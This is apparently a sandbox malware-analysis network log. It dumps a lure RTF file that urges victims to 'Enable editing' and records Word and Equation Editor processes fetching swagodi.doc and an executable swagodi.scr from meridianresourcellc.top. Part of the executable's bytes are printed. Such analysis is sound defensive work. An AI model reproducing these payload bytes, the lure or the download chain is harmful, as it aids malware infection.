                                              2024-07-26 21:45:16 UTC522INData Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 75 6f 77 39 42 71 63 38 50 74 58 54 50 33 69 38 35 44 72 34 52 79 55 6c 6e 70 4d 35 4e 69 31 4c 33 63 70 65 4a 61 77 53 61 74 72 51 6b 57 79 53 71 70 52 35 41 5a 4f 79 53 30 49 6f 55 52 61 4e 6d 74 59 70 64 30 56 4b 4d 4c 37 71 7d 0d 0d 7b 5c 38 32 35 34 34 30 39 39 38 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 72 65 20 66 61 69 72 6c 79 20 0d 0d 0a 73 74 61 74 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20
                                              Data Ascii: {\rtf1{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}{\825440998please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fairly stated in accordance
                                              2024-07-26 21:45:16 UTC1369INData Raw: 6f 20 70 6c 61 6e 20 74 68 65 20 61 75 64 69 74 2e 20 41 75 64 69 74 6f 72 73 20 75 73 65 20 74 68 69 73 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 61 73 73 65 73 73 20 74 68 65 20 72 69 73 6b 20 6f 66 20 6d 61 74 65 72 69 61 6c 20 0d 0d 0a 6d 69 73 73 74 61 74 65 6d 65 6e 74 20 6f 66 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 6e 64 20 74 6f 20 64 65 73 69 67 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 61 75 64 69 74 20 70 72 6f 63 65 64 75 72 65 73 20 74 6f 20 6d 69 6e 69 6d 69 7a 65 20 74 68 61 74 20 72 69 73 6b 2e 54 68 65 20 64 65 66 69 6e 69 74 69 6f 6e 20 6f 66 20 67 6f 6f 64 20 0d 0d 0a 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20
                                              Data Ascii: o plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls
                                              2024-07-26 21:45:16 UTC1369INData Raw: 64 65 66 69 63 69 65 6e 63 79 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 92 73 20 0d 0d 0a 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 77 68 65 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6c 61 63 6b 73 20 74 68 65 20 6b 6e 6f 77 6c 65 64 67 65 20 61 6e 64 20 0d 0d 0a 74 72 61 69 6e 69 6e 67 20 74 6f 20 70 72 65 70 61 72 65 20 69 74 73 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 66 6f 6f 74 6e 6f 74 65 20 64 69 73 63 6c 6f 73 75 72 65 73 2e 44 65 66 69 63
                                              Data Ascii: deficiency in internal control thats severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Defic
                                              2024-07-26 21:45:16 UTC1369INData Raw: 65 63 74 65 64 2e 4f 74 68 65 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 64 65 6e 74 69 66 69 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 73 65 76 65 72 65 20 0d 0d 0a 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 6f 72 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 6e 65 65 64 20 6e 6f 74 20 62 65 20 63 6f 6d 6d 75 6e 69 63 61 74 65 64 20 69 6e 20 77 72 69 74 69 6e 67 2e 20 49 66 20 61 75 64 69 74 6f 72 73 20 64 65 74 65 72 6d 69 6e 65 20 74 68 65 20 0d 0d 0a 64 65 66 69 63 69 65 6e 63 69 65 73 20 61 72 65 20 69 6d 70 6f 72 74 61
                                              Data Ascii: ected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are importa
                                              2024-07-26 21:45:16 UTC1369INData Raw: 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 2e 44 75 72 69 6e 67 20 74 68 65 20 63 6f 75 72 73 65 20 6f 66 20 61 6e 20 0d 0d 0a 61 75 64 69 74 2c 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 6d 69 67 68 74 20 61 6c 73 6f 20 69 64 65 6e 74 69 66 79 20 6f 74 68 65 72 20 6d 61 74 74 65 72 73 20 74 68 61 74 20 61 72 65 6e 92 74 20 63 6f 6e 73 69 64 65 72 65 64 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 2c 20 62 75 74 20 61 72 65 20 0d 0d 0a 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 20 66 6f 72 20 73 74 72 65 6e 67 74 68 65 6e 69 6e 67 20 70 72 6f 63 65 64 75 72 65 73 20 61 6e 64 2f 6f 72 20 6f 70 65 72 61 74 69 6e 67 20 64 65 66 69 63 69 65 6e 63 69 65 73 2e 20 54
                                              Data Ascii: those charged with governance.During the course of an audit, the auditors might also identify other matters that arent considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. T
                                              2024-07-26 21:45:16 UTC1369INData Raw: 0a 67 6f 76 65 72 6e 61 6e 63 65 20 77 69 74 68 20 76 61 6c 75 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 55 73 65 64 20 70 72 6f 70 65 72 6c 79 2c 20 74 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 63 61 6e 20 62 65 20 61 20 62 65 6e 65 66 69 63 69 61 6c 20 74 6f 6f 6c 20 0d 0d 0a 66 6f 72 20 61 73 73 69 73 74 69 6e 67 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 69 6e 20 66 75 6c 66 69 6c 6c 69 6e 67 20 74 68 65 69 72 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 25 34 34 25 36 46 25 36 33 25 37 35 25 36 44 25 36 35 25 36 45 0d 0d 0a 25 37 34 25
                                              Data Ascii: governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%
                                              2024-07-26 21:45:16 UTC1369INData Raw: 35 25 36 45 25 37 34 25 36 39 25 36 46 0d 0d 0a 25 36 45 25 36 31 25 36 43 25 32 30 25 36 39 25 36 45 25 37 34 25 36 35 25 37 32 25 36 31 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 37 33 25 32 30 25 37 34 25 36 46 25 32 30 25 37 30 25 37 32 25 36 46 25 36 44 25 36 46 25 37 34 25 36 35 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 37 30 25 37 32 25 36 46 25 36 34 25 37 35 25 36 33 25 37 34 25 37 33 25 32 30 25 36 31 25 36 45 0d 0d 0a 25 36 34 25 32 30 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 33 25 36 35 25 37 33 25 32 45 25 32 30 25 34 37 25 37 35 25 36 35 25 37 32 25 36 39 25 36 43 25 36 43 25 36 31 25 32 30 25 36 44 25 36 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 0d 0d 0a 25 36 37 25 32 30 25 37 33 25 37 34 25 37 32 25 36
                                              Data Ascii: 5%6E%74%69%6F%6E%61%6C%20%69%6E%74%65%72%61%63%74%69%6F%6E%73%20%74%6F%20%70%72%6F%6D%6F%74%65%20%74%68%65%20%70%72%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%72%6
                                              2024-07-26 21:45:16 UTC1369INData Raw: 25 32 30 25 36 46 25 36 32 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 45 25 36 37 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 35 25 36 45 0d 0d 0a 25 36 34 25 36 35 25 37 32 25 37 33 25 37 34 25 36 31 25 36 45 25 36 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 36 33 25 37 35 25 37 33 25 37 34 25 36 46 25 36 44 25 36 35 25 37 32 25 32 37 25 37 33 25 32 30 25 37 30 25 37 32 25 36 39 25 36 33 25 36 35 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 36 32 25 36 43 25 36 43 25 32 30 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73
                                              Data Ascii: %20%6F%62%73%65%72%76%69%6E%67%20%61%6E%64%20%75%6E%64%65%72%73%74%61%6E%64%69%6E%67%20%74%68%65%20%63%75%73%74%6F%6D%65%72%27%73%20%70%72%69%63%65%20%61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent auditors
                                              2024-07-26 21:45:16 UTC1369INData Raw: 6f 66 20 61 63 63 6f 75 6e 74 20 62 61 6c 61 6e 63 65 73 20 6f 72 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 20 64 69 73 63 6c 6f 73 75 72 65 73 2c 20 79 6f 75 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 63 6f 6e 73 69 64 65 72 65 64 20 74 6f 20 62 65 20 64 65 66 69 63 69 65 6e 74 2e 41 75 64 69 74 6f 72 73 20 0d 0d 0a 65 76 61 6c 75 61 74 65 20 65 61 63 68 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 79 20 6e 6f 74 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 2c 20 6f 72 20 61 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 0d 0d 0a 64 65 66 69 63 69 65 6e
                                              Data Ascii: of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficien
                                              2024-07-26 21:45:16 UTC1369INData Raw: 61 63 6b 73 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 64 65 63 69 73 69 6f 6e 2e 20 0d 0d 0a 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 6e 6f 6e 70 72 6f 66 69 74 73 20 74 68 61 74 20 6c 61 63 6b 20 74 68 65 20 61 62 69 6c 69 74 79 20 74 6f 20 70 72 65 70 61 72 65 20 74 68 65 69 72 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 6f 66 74 65 6e 20 66 69 6e 64 20 69 74 20 63 6f 73 74 20 70 72 6f 68 69 62 69 74 69 76 65 20 74 6f 20 72 65 6d 65 64 79 20 0d 0d 0a 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 20 62 79 20 74 72 61 69 6e 69 6e 67 20 63 75 72 72 65 6e 74 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 62 79 20 68 69 72 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 65 6d 70
                                              Data Ascii: acks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional emp


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249167104.21.52.88443748C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:18 UTC154OUTHEAD /swagodi.doc HTTP/1.1
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: meridianresourcellc.top
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:18 UTC859INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:18 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66371
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=em5IUTDkNWkl8HXCcoopv5kVxg5%2B6d0ml85snYrjbdnIm9xJjZyCK%2Bctuoc8qEXdzJ6DuEDMhQdB5%2BRWKxMZZXKFJ0A%2BL6n10rUiskFRWesgKW9mul%2FDJqRyulv%2Bo8Kk%2FZErk9aiLgUT3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a979370cfce7cf9-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249168104.21.52.884433408C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:20 UTC321OUTGET /swagodi.scr HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: meridianresourcellc.top
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:20 UTC787INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:20 GMT
                                              Content-Type: application/x-silverlight
                                              Content-Length: 683016
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 12:01:08 GMT
                                              ETag: "a6c08-61e25444207e0"
                                              Accept-Ranges: bytes
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xXZkEQvAtIqq3yu0%2BSEv%2FWYlNsMq9zX5bCNI3VAIw1h9yEpOadLa%2F92ptRSSWYOgt3h9S30uc9rkJzP2aDLMZKJWvSkD%2F16%2B5qdnqb80Us64ZLnwWMDrPCQvYfIwOe4cNo%2BDDh5WIl9B6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97937f190c4345-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:20 UTC582INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 8f a3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2a 0a 00 00 0a 00 00 00 00 00 00 56 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf0*VI `@ @
                                              2024-07-26 21:45:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 02 00 00 04 02 28 16 00 00 0a 00 00 02 28 08 00 00 06 00 2a 13 30 03 00 2f 00 00 00 01 00 00 11 00 28 17 00 00 0a 02 fe 06 09 00 00 06 73 18 00 00 0a 6f 19 00 00 0a 02 fe 06 0a 00 00 06 73 1a 00 00 0a 20 00 00 05 00 6f 1b 00 00 0a 0a 2a 00 1b 30 02 00 80 00 00 00 02 00 00 11 00 03 72 01 00 00 70 6f 1c 00 00 0a 0a 06 2c 0b 06 28 01 00 00 2b 16 fe 02 2b 01 16 0c 08 2c 0b 06 16 9a 6f 1e 00 00 0a 0d 2b 53 03 6f 1f 00 00 0a 0b 00 07 13 04 16 13 05 2b 37 11 04 11 05 9a 13 06 00 00 02 11 06 28 03 00 00 06 13 07 11 07 28 20 00 00 0a 16 fe 01 13 08 11 08 2c 05 11 07 0d de 1b 00 de 05 26 00 00 de 00 00 11 05 17 58 13 05 11 05 11 04 8e 69 32 c1 14 0d 2b 00 09 2a 01 10 00 00 00 00 43 00 23 66 00 05 1c 00 00 01 1e 02 7b 01 00
                                              Data Ascii: ^}((*0/(sos o*0rpo,(++,o+So+7(( ,&Xi2+*C#f{
                                              2024-07-26 21:45:20 UTC1369INData Raw: 00 0a 16 fe 01 2b 01 16 0a 06 2c 0e 00 02 7b 07 00 00 04 6f 53 00 00 0a 00 00 02 7b 10 00 00 04 17 6f 52 00 00 0a 00 2a 00 1b 30 03 00 5d 01 00 00 06 00 00 11 00 02 7b 10 00 00 04 16 6f 52 00 00 0a 00 02 7b 07 00 00 04 2c 10 02 7b 07 00 00 04 6f 49 00 00 0a 16 fe 01 2b 01 16 0a 06 2c 05 38 2c 01 00 00 02 73 4a 00 00 0a 7d 07 00 00 04 02 7b 07 00 00 04 6f 4b 00 00 0a 16 6f 4c 00 00 0a 00 02 7b 07 00 00 04 6f 4b 00 00 0a 72 2c 02 00 70 6f 4d 00 00 0a 00 02 7b 07 00 00 04 6f 4b 00 00 0a 72 d5 02 00 70 6f 4e 00 00 0a 00 02 7b 07 00 00 04 6f 4b 00 00 0a 17 6f 54 00 00 0a 00 02 7b 07 00 00 04 6f 4b 00 00 0a 17 6f 55 00 00 0a 00 02 7b 07 00 00 04 17 6f 56 00 00 0a 00 02 7b 07 00 00 04 6f 4b 00 00 0a 17 6f 4f 00 00 0a 00 02 7b 07 00 00 04 02 fe 06 11 00 00 06 73
                                              Data Ascii: +,{oS{oR*0]{oR{,{oI+,8,sJ}{oKoL{oKr,poM{oKrpoN{oKoT{oKoU{oV{oKoO{s
                                              2024-07-26 21:45:20 UTC1369INData Raw: 00 02 7b 0a 00 00 04 72 09 03 00 70 6f 32 00 00 0a 00 02 7b 10 00 00 04 18 6f 7e 00 00 0a 00 02 7b 10 00 00 04 06 72 1f 03 00 70 6f 7f 00 00 0a 74 6f 00 00 01 6f 80 00 00 0a 00 02 7b 10 00 00 04 28 81 00 00 0a 6f 82 00 00 0a 00 02 7b 10 00 00 04 72 55 03 00 70 6f 83 00 00 0a 00 02 7b 10 00 00 04 1f 17 1f 16 73 2f 00 00 0a 6f 84 00 00 0a 00 02 7b 10 00 00 04 72 7f 03 00 70 6f 45 00 00 0a 00 02 7b 10 00 00 04 02 fe 06 14 00 00 06 73 3c 00 00 0a 6f 85 00 00 0a 00 02 7b 11 00 00 04 18 6f 7e 00 00 0a 00 02 7b 11 00 00 04 16 6f 52 00 00 0a 00 02 7b 11 00 00 04 06 72 8b 03 00 70 6f 7f 00 00 0a 74 6f 00 00 01 6f 80 00 00 0a 00 02 7b 11 00 00 04 28 81 00 00 0a 6f 82 00 00 0a 00 02 7b 11 00 00 04 72 bf 03 00 70 6f 83 00 00 0a 00 06 72 e7 03 00 70 6f 7f 00 00 0a 75
                                              Data Ascii: {rpo2{o~{rpotoo{(o{rUpo{s/o{rpoE{s<o{o~{oR{rpotoo{(o{rporpou
                                              2024-07-26 21:45:20 UTC1369INData Raw: 04 6f 3f 00 00 0a 00 02 16 28 3e 00 00 0a 00 02 28 3f 00 00 0a 00 2a 13 30 05 00 1c 00 00 00 09 00 00 11 00 19 8d 4f 00 00 01 25 16 03 16 9a a2 25 17 03 17 9a a2 25 18 04 a2 0a 2b 00 06 2a 6e 72 cf 05 00 70 17 8d 77 00 00 01 25 16 1f 2b 9d 28 8e 00 00 0a 80 06 00 00 04 2a 6a 00 28 8f 00 00 0a 00 16 28 90 00 00 0a 00 73 0b 00 00 06 28 91 00 00 0a 00 2a 26 02 28 92 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 0a 00 00 11 00 7e 13 00 00 04 14 fe 01 0a 06 2c 22 00 72 ef 05 00 70 d0 05 00 00 02 28 6c 00 00 0a 6f 93 00 00 0a 73 94 00 00 0a 0b 07 80 13 00 00 04 00 7e 13 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 0b 00 00 11 00 7e 14 00 00 04 0a 2b 00 06 2a 22 00 02 80 14 00 00 04 2a 13 30 03 00 21 00 00 00 0c 00 00 11 00 28 1c 00 00 06 72 2d
                                              Data Ascii: o?(>(?*0O%%%+*nrpw%+(*j((s(*&(*09~,"rp(los~+*0~+*"*0!(r-
                                              2024-07-26 21:45:20 UTC1369INData Raw: b3 00 00 0a 18 59 1f 0e 6f b4 00 00 0a 00 02 17 16 1f 10 1f 10 73 b5 00 00 0a 28 2f 00 00 06 00 03 6f b0 00 00 0a 02 28 2e 00 00 06 0b 12 01 28 b6 00 00 0a 16 28 27 00 00 06 00 00 2b 61 02 1c 28 3b 00 00 06 13 04 11 04 2c 54 00 03 6f b0 00 00 0a 28 b1 00 00 0a 17 17 02 28 b3 00 00 0a 18 59 1f 0e 6f b4 00 00 0a 00 02 02 28 b3 00 00 0a 1f 11 59 16 1f 10 1f 10 73 b5 00 00 0a 28 2f 00 00 06 00 03 6f b0 00 00 0a 02 28 2e 00 00 06 0b 12 01 28 b6 00 00 0a 17 28 27 00 00 06 00 00 2a 00 00 13 30 02 00 1e 00 00 00 03 00 00 11 00 02 03 28 b7 00 00 0a 00 02 7b 1f 00 00 04 16 fe 01 0a 06 2c 07 02 28 39 00 00 06 00 2a 00 00 13 30 02 00 17 00 00 00 03 00 00 11 00 02 7b 1e 00 00 04 16 fe 01 0a 06 2c 08 02 15 28 38 00 00 06 00 2a 3a 00 02 03 04 05 15 15 28 37 00 00 06 00
                                              Data Ascii: Yos(/o(.(('+a(;,To((Yo(Ys(/o(.(('*0({,(9*0{,(8*:(7
                                              2024-07-26 21:45:20 UTC1369INData Raw: 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 19 00 00 00 03 00 00 11 00 02 03 16 28 43 00 00 06 16 fe 01 0a 06 2c 08 02 03 28 d2 00 00 0a 00 2a 00 00 00 13 30 03 00 0e 00 00 00 03 00 00 11 00 02 03 17 28 43 00 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 45 00 00 00 1c 00 00 11 00 02 28 2c 00 00 06 16 fe 03 0a 06 2c 31 00 03 28 d3 00 00 0a 0c 08 0b 07 1f 24 2e 17 2b 00 07 20 84 00 00 00 2e 02 2b 15 02 03 04 28 45 00 00 06 0d 2b 0f 02 03 28 44 00 00 06 0d 2b 05 00 16 0d 2b 00 09 2a 00 00 00 13 30 03 00 3f 01 00 00 1d 00 00 11 00 02 28 3a 00 00 06 0a 06 14 fe 03 0b 07 39 24 01 00 00 00 03 28 d4 00 00 0a d0 0d 00 00 02 28 6c 00 00 0a 28 d5 00 00 0a a5 0d 00 00 02 0c 06 6f d6 00 00 0a 13 04 12 04 28 9a 00 00 0a 16 fe 03 0d 09 2c 1c 12 02 7c 41 00 00 04 06 6f d6 00 00 0a
                                              Data Ascii: +*0(C,(*0(C+*0E(,,1($.+ .+(E+(D++*0?(:9$((l(o(,|Ao
                                              2024-07-26 21:45:20 UTC1369INData Raw: 13 30 02 00 2c 00 00 00 20 00 00 11 00 02 28 50 00 00 06 0a 06 2c 07 02 28 5b 00 00 06 00 02 28 52 00 00 06 14 fe 03 0b 07 2c 0c 02 28 52 00 00 06 6f 2b 00 00 06 00 2a 3e 00 02 03 04 05 0e 04 16 28 57 00 00 06 00 2a 4a 00 02 03 04 05 0e 04 15 15 0e 05 28 58 00 00 06 00 2a 00 13 30 06 00 3a 00 00 00 21 00 00 11 00 04 6f c9 00 00 0a 0a 02 04 28 5c 00 00 06 00 02 7b 38 00 00 04 0e 07 6f 2d 00 00 06 00 02 7b 38 00 00 04 03 05 0e 04 0e 05 0e 06 6f 37 00 00 06 00 04 6f e6 00 00 0a 26 2a 00 00 13 30 01 00 31 00 00 00 03 00 00 11 00 02 7b 38 00 00 04 2c 0d 02 7b 38 00 00 04 6f e4 00 00 0a 2b 01 16 0a 06 2c 15 00 02 7b 38 00 00 04 6f e7 00 00 0a 00 02 28 5b 00 00 06 00 00 2a 26 00 02 28 5b 00 00 06 00 2a 00 13 30 02 00 3e 00 00 00 20 00 00 11 00 02 7b 37 00 00 04
                                              Data Ascii: 0, (P,([(R,(Ro+*>(W*J(X*0:!o(\{8o-{8o7o&*01{8,{8o+,{8o([*&([*0> {7
                                              2024-07-26 21:45:20 UTC1369INData Raw: 13 02 13 0a 00 81 0c 02 13 0e 00 30 0e c4 10 0e 00 a2 0f c4 10 06 00 26 15 25 0c 06 00 0d 05 25 0c 06 00 96 00 25 0c 0a 00 92 06 02 13 0e 00 9e 13 4b 13 06 00 c2 04 25 0c 12 00 d3 13 82 0a 12 00 57 10 82 0a 0a 00 1f 05 02 13 0a 00 c1 13 02 13 0a 00 0d 0d 02 13 0a 00 7f 05 02 13 12 00 7d 04 82 0a 06 00 29 0a ad 16 0a 00 60 05 02 13 0a 00 3a 17 02 13 cb 01 25 0d 00 00 06 00 8a 10 25 0c 06 00 4f 12 e9 0c 06 00 3d 0f e9 0c 06 00 1d 0f 25 0c 0e 00 85 06 b0 0c 0a 00 6f 15 02 13 12 00 dd 11 82 0a 12 00 b9 0a 82 0a 0a 00 36 0d 2e 16 06 00 b0 10 25 0c 06 00 6a 0b 18 11 00 00 00 00 b3 00 00 00 00 00 01 00 01 00 01 00 10 00 44 0f 27 10 41 00 01 00 01 00 01 00 10 00 5a 0c 27 10 41 00 05 00 0b 00 80 01 10 00 06 0c 27 10 5d 00 13 00 1a 00 00 00 10 00 5e 11 fa 11 5d 00
                                              Data Ascii: 0&%%%K%W})`:%%O=%o6.%jD'AZ'A']^]
